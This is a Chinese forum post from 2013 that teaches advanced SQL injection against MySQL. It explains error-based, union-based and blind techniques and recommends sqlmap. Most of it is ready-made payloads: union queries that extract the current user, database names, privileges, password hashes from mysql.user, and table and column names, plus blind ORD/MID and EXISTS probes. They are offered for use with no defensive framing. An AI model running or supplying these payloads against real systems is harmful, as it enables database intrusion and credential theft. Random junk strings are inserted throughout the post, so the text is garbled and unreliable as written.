放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。, t& h8 K7 C+ D: F
" q8 ~0 C6 c4 W% w; C# M+ q- r这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表$ Z2 z. e6 y7 {/ o
$ z M$ I* J# {6 P$ Z$ D' s# B分类标准 分类 备注
1 l G7 z/ L' o. p! Y6 B按字段类型 整型注入,字符型注入
) X' o( ~6 r' h7 i: m按出现的位置 get注入,post注入,cookie注入,http header注入 - I3 } }# N6 y0 g
然而高级注入是这样的
+ w: V8 z' k- ^1 W8 \+ W; D " {) b) S% `# P0 w. g8 v
高级注入分类 条件: ^% q# t* V" N
error-based sql 数据库的错误回显可以返回,存在数据库,表结构
) K3 a( o* w# ]+ ~' U' Eunion-based sql 能够使用union,存在数据库,表结构
8 O, ~: a- w! u) Eblind sql 存在注入2 h3 P9 O" m7 ^9 x1 B' N9 I! |
我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。5 V, e& S& ~; F9 ~# u& |
$ u# V" m) { H好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火* j" S4 o4 }9 q# S( v& p0 w
) B3 R0 R7 ~- S% |) y
附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。
- j9 l% k. V3 O& w0 m1 x - Q7 c) q+ ]1 Z% n4 y h/ t+ A
这里用mysql说明* K- h; I/ N. `1 f* Z5 `4 {- e, U8 X
- M: r" Q2 A; L5 v- j) O% z
e注入坛子里很多了,请看戳我或者再戳我% k1 @0 j0 C* P) y) W
, |: N1 M0 k1 yu注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的' P6 y* u. U$ k5 i
; _% Z6 i8 |; i
获取当前数据库用户名
! X- _, p3 w3 Q
3 j; o( |: Q9 {: L- L( `' IUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C& y7 ?" l7 n5 e4 F9 O$ s/ b
AST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL+ l8 f6 O+ \, |5 o& R
L, NULL#
1 s0 H/ R7 ^1 Z4 L注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。4 R. w9 g5 d/ N. G H& |6 i
; l- |$ [, K3 R5 Q
获取数据库名5 }# Y8 C$ C- g
( i+ j% p" u) DUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#7 f0 e0 p2 k; `' p5 Q0 F) h
获取所有用户名
! _) X; ^. t2 W3 d
0 D/ J9 N- k0 R& n' y8 ]- W8 XUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
D( e+ G h$ `) D查看当前用户权限
2 D0 C/ G) j) C( G4 q
9 F4 t' `, K) Y) DUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
& r' T3 D4 J2 C+ c; z. ~6 U% V尝试获取密码,当然需要有能读mysql数据库的权限% v5 ?+ L" q. S
" y$ c' X7 V& k
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#1 a' r/ e# M: p
获取表名,limit什么的自己搞啦
/ m) S, J# t( F' }/ B
% S2 r& p7 H; o7 s( QUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#, F' X. v) v( ?; o. X% k
获取字段名及其类型 G3 l2 n8 ?: i9 i, U+ b- j r
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#
% t" c7 {! o3 v 2 c( r: P' J5 _5 C) s1 ~
b注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。
E6 T. r9 f+ X T) W3 ~5 M, d& v 7 `% `* h. R/ _6 }
如:
* w( f3 M1 n F4 {9 M) Q获取当前用户名# K8 t8 e1 @2 |2 [3 S7 w' _& n, F
" _8 z: t5 \/ F. k% w4 n
AND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 116* L+ b& P" K3 u% s. A& U( P2 S
获取当前数据库
% F$ [; ~' d! e6 Q4 l* O) b 3 t; }, ^- I0 P. I
AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 106
# j) z; Z+ N7 ?获取表名% L l4 ?. O+ W
# V" [) j) i w- BAND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 51$ s/ J9 ~0 V1 r) D" ]
获取字段名及其类型和爆内容就不说了,改改上面的就可以了。6 {& ?% I5 V& E8 Q# l/ i: J; S9 @
回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。
" c2 _) V" {- [; N/ R9 J/ ]+ [2 [爆表8 Z9 ]* j/ v9 n5 s6 {+ |3 R
% Q+ u4 D5 h+ r; m5 YAND EXISTS(select * from table). o: ?0 s# r3 R, |3 f3 r
爆字段/ \. l2 F5 `& O: v5 f
7 H8 f4 \0 S' }% v& A
AND EXISTS(select pwd from table)+ Q3 w1 d6 {" l- T/ c, m$ w* T
盲注的变化就比较多了,由于篇幅,只是举个例子而已。4 S& _ K- r. @6 |( j
" I3 J, O6 R$ L2 l q6 {, R本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。8 q( r4 @ e0 A3 y' X0 _; O$ }2 e' h
|
发表于 2013-7-16 20:31:26
收藏
支持
反对